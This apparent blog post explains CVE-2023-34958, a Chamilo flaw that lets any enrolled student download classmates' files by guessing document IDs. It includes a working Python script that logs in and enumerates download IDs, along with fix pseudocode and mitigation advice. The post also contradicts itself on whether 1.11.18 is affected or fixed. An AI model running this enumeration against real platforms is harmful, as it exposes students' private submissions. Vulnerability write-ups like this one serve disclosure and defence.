CVE-2023-34958 - How a Chamilo Student Can Download Other Students’ Files (Explained Simply)

Chamilo is a widely used e-learning platform, popular in schools, universities, and businesses. Thousands rely on it to securely host courses, documents, and assignments. But a vulnerability disclosed as CVE-2023-34958 shows that, for several years, privacy in Chamilo wasn’t as solid as folks expected.

In this post, I’ll walk you through what went wrong, show you sample code, and share details about exploiting this vulnerability in Chamilo 1.11.* up to 1.11.18. If you’re a school IT admin, a Chamilo user, or a security enthusiast, read on.

What Is CVE-2023-34958?

At its heart, CVE-2023-34958 is an Incorrect Access Control vulnerability—a classic case of “if you know the magic key, you can get in.” In affected versions of Chamilo, if you’re a student enrolled in a course and you know another student’s document ID, you can download their file. No special permissions needed. No teacher involved.

Official Advisory

- NVD - CVE-2023-34958
- Chamilo Security Advisory

How Did This Happen?

Chamilo has a feature letting students upload and download course-related files. These files are stored with unique IDs and are supposed to be private, or at least only visible to a specific group.

But the code that handles downloads only checked if the requesting user was enrolled in the same course—not if the file *belonged* to them.

So if Student Alice uploads “AliceEssay.docx” and it’s assigned, for example, document ID 1745, any other student, say Bob, can download it if he knows 1745.

Chamilo’s URL structure for downloads looks something like this

https://chamilo.example.edu/main/document/download.php?doc_id=1745

If Bob plugs in Alice’s doc ID, he gets the file.

`

https://chamilo.example.edu/main/document/download.php?doc_id=1745

Suppose Bob wants to try document IDs from 170 to 180

import requests

session = requests.Session()
# Replace with real Chamilo credentials and login URL
login_url = "https://chamilo.example.edu/main/auth/login.php";
payload = {'login': 'bob', 'password': 'bob_password'}

# Log in and keep session cookies
response = session.post(login_url, data=payload)
if "Logout" in response.text:
    print("Logged in!")

    # Try each doc_id in given range
    for doc_id in range(170, 180):
        dl_url = f"https://chamilo.example.edu/main/document/download.php?doc_id={doc_id}";
        r = session.get(dl_url)
        if r.headers.get("Content-Type", "").startswith("application/"):
            print(f"Leaked file found at doc_id={doc_id}")
            with open(f"doc_{doc_id}", "wb") as out_file:
                out_file.write(r.content)
else:
    print("Failed to log in.")

What does this script do?
It logs in as Bob, pokes Chamilo’s download handler for each doc_id, and saves any real files it finds.

Why Is This a Big Deal?

It’s more than a privacy breach. Students trust that only teachers (and maybe groupmates) can see their submissions. With this bug, anyone in a course could download and misuse:

Any uploaded file, intentional or not

In an academic or medical context, this could be a major GDPR or FERPA violation.

How Was It Fixed?

Chamilo 1.11.18 plugged this hole. Now, the download handler checks whether you are allowed to access the specific file before sending it.

Here’s a simplified fixed code example (PHP-like pseudocode)

// Old code
if (user_is_subscribed_to_course($course_id)) {
    serve_file($file_id);
}

// New code
if (user_can_access_document($user_id, $file_id)) {
    serve_file($file_id);
}

*Now, user_can_access_document checks document ownership and permissions, not just course subscription.*

Audit your logs – Check for unusual download activity around document IDs.

- Limit document visibility – Use group assignments where possible, and minimize cross-user document access.

Don’t try accessing others’ files—it’s likely illegal and definitely unethical.

- Notify your IT/admins if you spot strange behaviors.

References

- CVE-2023-34958 on NVD
- Chamilo Security Advisory 1.11.18
- Chamilo E-learning Platform

Final Thoughts

Incorrect access control bugs like CVE-2023-34958 are among the most impactful and easy to overlook. When platforms don’t check permissions at the right level, private data can leak—even if the rest of the system looks secure.

Always keep your software updated, and remember: privacy by design is not a feature, it’s a necessity.


*This post is an original, simplified explanation based on public reporting, project updates, and hands-on research. Be responsible with this knowledge!*

Timeline

Published on: 06/08/2023 19:15:00 UTC
Last modified on: 06/15/2023 17:30:00 UTC